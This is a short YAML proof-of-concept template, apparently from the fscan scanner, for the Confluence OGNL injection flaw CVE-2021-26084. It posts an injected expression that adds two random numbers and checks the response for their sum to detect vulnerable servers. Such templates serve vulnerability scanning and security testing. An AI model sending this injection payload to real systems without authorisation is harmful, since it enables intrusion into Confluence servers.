mirror of https://github.com/qwqdanchun/fscan.git
16 lines
526 B
YAML
16 lines
526 B
YAML
name: poc-yaml-confluence-cve-2021-26084
|
|
set:
|
|
r1: randomInt(100000, 999999)
|
|
r2: randomInt(100000, 999999)
|
|
rules:
|
|
- method: POST
|
|
path: /pages/createpage-entervariables.action?SpaceKey=x
|
|
body: |
|
|
queryString=\u0027%2b%7b{{r1}}%2B{{r2}}%7d%2b\u0027
|
|
expression: |
|
|
response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
|
|
detail:
|
|
author: Loneyer(https://github.com/Loneyers)
|
|
links:
|
|
- https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
|